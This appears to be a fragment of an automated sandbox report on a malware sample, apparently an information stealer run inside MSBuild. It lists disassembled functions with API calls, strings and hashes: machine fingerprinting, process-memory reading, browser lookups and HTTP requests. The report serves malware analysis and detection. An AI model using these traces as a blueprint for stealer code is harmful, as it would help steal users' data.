                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004044EF
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040450E
                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 00404566
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404597
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004045A4
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004045AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                        • String ID: GET
                                                                                        • API String ID: 442264750-1805413626
                                                                                        • Opcode ID: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
                                                                                        • Instruction ID: db9b65f6ff3aa58b69ab7c80ee4b507d2baca41c59675a027e4a866d6253625d
                                                                                        • Opcode Fuzzy Hash: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
                                                                                        • Instruction Fuzzy Hash: FC5165B1A00219BBDB20DBA5DD45FAF77B9EB88701F005129FB05B72C1D7749E058BA4
                                                                                        Function 00410420 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 124memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                        • GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                        • wsprintfA.USER32 ref: 004104F9
                                                                                        • lstrcatA.KERNEL32(00000000,004238B4), ref: 00410508
                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410515
                                                                                        • lstrlenA.KERNEL32(00000000,Unknown), ref: 0041053E
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410568
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
                                                                                        • String ID: C$Unknown${kA${kA:\
                                                                                        • API String ID: 3099411152-4130650692
                                                                                        • Opcode ID: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
                                                                                        • Instruction ID: 2c5738cd0ea039ca6d181a749ddccaa7ec64b74ae76ae9b2a1b3dd877f563171
                                                                                        • Opcode Fuzzy Hash: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
                                                                                        • Instruction Fuzzy Hash: 38419171A00218ABDB10EBA4DC46FEE777CEF44705F144169F605B7181EBB85A44CBEA
                                                                                        Function 00416510 Relevance: 20.5, APIs: 4, Strings: 7, Instructions: 1232networksleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 00411400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
                                                                                          • Part of subcall function 00411400: Process32First.KERNEL32(00000000,00000128), ref: 00411449
                                                                                          • Part of subcall function 00411400: Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
                                                                                          • Part of subcall function 00411400: StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
                                                                                          • Part of subcall function 00411400: FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,016996B0,00000000,?,004201E9,00000000,004176BE), ref: 00416A16
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B22
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B3C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                          • Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                          • Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                          • Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                          • Part of subcall function 00403E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
                                                                                          • Part of subcall function 00403E20: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00403EC7
                                                                                          • Part of subcall function 004123F0: StrCmpCA.SHLWAPI(00000000,block,?,00416B9A), ref: 0041240D
                                                                                          • Part of subcall function 004123F0: ExitProcess.KERNEL32 ref: 00412418
                                                                                          • Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040E8C0
                                                                                          • Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040E947
                                                                                          • Part of subcall function 00405BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
                                                                                          • Part of subcall function 00405BB0: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00405C57
                                                                                          • Part of subcall function 00411F00: strtok_s.MSVCRT ref: 00411F24
                                                                                        • Sleep.KERNEL32(000003E8), ref: 00416F45
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0169A5F0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415D5B
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00000000), ref: 00415D7E
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415D9A
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DAE
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0169ADA8), ref: 00415DC1
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DD5
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,01699C48), ref: 00415DE9
                                                                                          • Part of subcall function 004045D0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
                                                                                          • Part of subcall function 004045D0: StrCmpCA.SHLWAPI(?,0169A3B0,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
                                                                                          • Part of subcall function 004045D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindowsstrtok_s
                                                                                        • String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
                                                                                        • API String ID: 1055840830-1018522893
                                                                                        • Opcode ID: 69d9d5f4bed522298f1fff638014f460091bb7ee520ceaa31fb168f63291bf67
                                                                                        • Instruction ID: f22d2bd86038d1de50829419776aae838be0a57aa5f174395c24aa0c803a3848
                                                                                        • Opcode Fuzzy Hash: 69d9d5f4bed522298f1fff638014f460091bb7ee520ceaa31fb168f63291bf67
                                                                                        • Instruction Fuzzy Hash: 8AA24472D10114AACB24FB61DC52EEEB778AF54304F50817EE506725D2EF382B4DCAA9
                                                                                        Function 0040E870 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 375COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040E8C0
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040E947
                                                                                        • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040ECBD
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1D0), ref: 0040EA4C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040EB30
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040EBB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy
                                                                                        • String ID: Stable\$firefox
                                                                                        • API String ID: 3722407311-3160656979
                                                                                        • Opcode ID: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
                                                                                        • Instruction ID: dc9232c6f18d92b7668f1a551db38a5b0db8dd03ba54f88d7fb460d1fcb80d8e
                                                                                        • Opcode Fuzzy Hash: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
                                                                                        • Instruction Fuzzy Hash: 97E12371A002049BCB24FF65D956EDE77B9BF44304F40C53EEC49AB691DB38AA08CB95
                                                                                        Function 0040F550 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 192COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040F561
                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000030), ref: 0040F588
                                                                                        • memset.MSVCRT ref: 0040F5E4
                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040F63C
                                                                                        • memset.MSVCRT ref: 0040F6CF
                                                                                        Strings
                                                                                        • N0ZWFt, xrefs: 0040F692
                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F5FA, 0040F6E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Processmemset$MemoryOpenRead
                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                        • API String ID: 2048220554-1622206642
                                                                                        • Opcode ID: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
                                                                                        • Instruction ID: a21cb42e5d324bd6ca82509aa78599428660c3814b2df02d38e35266ba1ec8a6
                                                                                        • Opcode Fuzzy Hash: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
                                                                                        • Instruction Fuzzy Hash: 93613471E00215AAEB309BA5DC45BAFB7B4AF84314F14453AE408B72C1E77C9948CBA9
                                                                                        Function 00403D70 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54stringnetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CrackInternetlstrlen
                                                                                        • String ID: 5P@$<
                                                                                        • API String ID: 1274457161-3404980136
                                                                                        • Opcode ID: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
                                                                                        • Instruction ID: ffcd9b35b4bfddae0e9debaaaaff4d4a67ad705ebd42d737fa1e7e78837649a8
                                                                                        • Opcode Fuzzy Hash: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
                                                                                        • Instruction Fuzzy Hash: 23113071D00208ABDB04EFA5DC85BDDB7B8EB44314F10513AFA15B7291EF745505CB98
                                                                                        Function 00410340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00410365
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
                                                                                        • RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
                                                                                        • RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
                                                                                        • CharToOemA.USER32(00000000,?), ref: 004103C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CharCloseOpenQueryValuememset
                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                        • API String ID: 2391366103-1211650757
                                                                                        • Opcode ID: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
                                                                                        • Instruction ID: 782b84d42d0d06b912d34d3dac9a589f721f2d7cdf24700b86374e4a20e7c3f4
                                                                                        • Opcode Fuzzy Hash: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
                                                                                        • Instruction Fuzzy Hash: E001D475A4030CBBDB60DB90DC4AFEEB778EB04700F100199F648A6081DBB46BC48B94
                                                                                        Function 00412FA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                          • Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                          • Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                          • Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                          • Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                          • Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00413011
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041304E
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041306B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 3240024479-2861137601
                                                                                        • Opcode ID: c2d7594e3234da1f33466824e59ddf573229d6e823bcf9993492a33c190d25a3
                                                                                        • Instruction ID: bd4d237804207bf9bc1d7224717f3b297064a78b5ccb05320e04b95c877dc140
                                                                                        • Opcode Fuzzy Hash: c2d7594e3234da1f33466824e59ddf573229d6e823bcf9993492a33c190d25a3
                                                                                        • Instruction Fuzzy Hash: E43180329001046BCB24FF71DC569EE37A8AE54704F40813AFD0672592EF386B488BA8
                                                                                        Function 004105A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004105BC
                                                                                          • Part of subcall function 0040FA60: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
                                                                                          • Part of subcall function 0040FA60: HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
                                                                                          • Part of subcall function 0040FA60: RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,?), ref: 0040FA9B
